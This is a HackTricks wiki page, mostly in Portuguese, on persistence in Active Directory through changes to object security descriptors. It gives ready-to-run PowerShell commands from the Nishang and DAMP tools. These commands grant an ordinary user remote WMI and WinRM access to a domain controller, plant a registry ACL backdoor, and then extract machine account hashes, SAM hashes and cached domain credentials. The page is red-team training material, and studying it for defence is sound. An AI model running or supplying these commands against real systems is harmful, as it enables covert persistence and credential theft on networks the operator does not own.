# Security Descriptors
{% hint style="success" %}
Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
Support HackTricks
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** đŹ [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** đŠ [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
{% endhint %}
## Security Descriptors
[From the docs](https://learn.microsoft.com/en-us/windows/win32/secauthz/security-descriptor-definition-language): A Linguagem de Definição de Descritor de Segurança (SDDL) define o formato que é usado para descrever um descritor de segurança. SDDL usa strings ACE para DACL e SACL: `ace_type;ace_flags;rights;object_guid;inherit_object_guid;account_sid;`
Os **descritores de segurança** sĂŁo usados para **armazenar** as **permissĂ”es** que um **objeto** tem **sobre** um **objeto**. Se vocĂȘ puder **fazer** uma **pequena mudança** no **descritor de segurança** de um objeto, poderĂĄ obter privilĂ©gios muito interessantes sobre esse objeto sem precisar ser membro de um grupo privilegiado.
EntĂŁo, essa tĂ©cnica de persistĂȘncia Ă© baseada na capacidade de obter todos os privilĂ©gios necessĂĄrios contra certos objetos, para poder realizar uma tarefa que geralmente requer privilĂ©gios de administrador, mas sem a necessidade de ser administrador.
### Access to WMI
VocĂȘ pode dar a um usuĂĄrio acesso para **executar remotamente WMI** [**usando isso**](https://github.com/samratashok/nishang/blob/master/Backdoors/Set-RemoteWMI.ps1):
```bash
Set-RemoteWMI -UserName student1 -ComputerName dcorp-dc ânamespace 'root\cimv2' -Verbose
Set-RemoteWMI -UserName student1 -ComputerName dcorp-dcânamespace 'root\cimv2' -Remove -Verbose #Remove
```
### Acesso ao WinRM
DĂȘ acesso ao **console PS do winrm a um usuĂĄrio** [**usando isso**](https://github.com/samratashok/nishang/blob/master/Backdoors/Set-RemoteWMI.ps1)**:**
```bash
Set-RemotePSRemoting -UserName student1 -ComputerName -Verbose
Set-RemotePSRemoting -UserName student1 -ComputerName -Remove #Remove
```
### Acesso remoto a hashes
Acesse o **registro** e **extraia hashes** criando um **backdoor de registro usando** [**DAMP**](https://github.com/HarmJ0y/DAMP)**,** para que vocĂȘ possa a qualquer momento recuperar o **hash do computador**, o **SAM** e qualquer **credencial AD** em cache no computador. Portanto, Ă© muito Ăștil conceder essa permissĂŁo a um **usuĂĄrio regular contra um computador Controlador de DomĂnio**:
```bash
# allows for the remote retrieval of a system's machine and local account hashes, as well as its domain cached credentials.
Add-RemoteRegBackdoor -ComputerName -Trustee student1 -Verbose
# Abuses the ACL backdoor set by Add-RemoteRegBackdoor to remotely retrieve the local machine account hash for the specified machine.
Get-RemoteMachineAccountHash -ComputerName -Verbose
# Abuses the ACL backdoor set by Add-RemoteRegBackdoor to remotely retrieve the local SAM account hashes for the specified machine.
Get-RemoteLocalAccountHash -ComputerName -Verbose
# Abuses the ACL backdoor set by Add-RemoteRegBackdoor to remotely retrieve the domain cached credentials for the specified machine.
Get-RemoteCachedCredential -ComputerName -Verbose
```
Verifique [**Silver Tickets**](silver-ticket.md) para aprender como vocĂȘ poderia usar o hash da conta do computador de um Controlador de DomĂnio.
{% hint style="success" %}
Aprenda e pratique Hacking AWS:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
Aprenda e pratique Hacking GCP: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
Support HackTricks
* Verifique os [**planos de assinatura**](https://github.com/sponsors/carlospolop)!
* **Junte-se ao** đŹ [**grupo do Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo do telegram**](https://t.me/peass) ou **siga**-nos no **Twitter** đŠ [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Compartilhe truques de hacking enviando PRs para os repositĂłrios do** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud).
{% endhint %}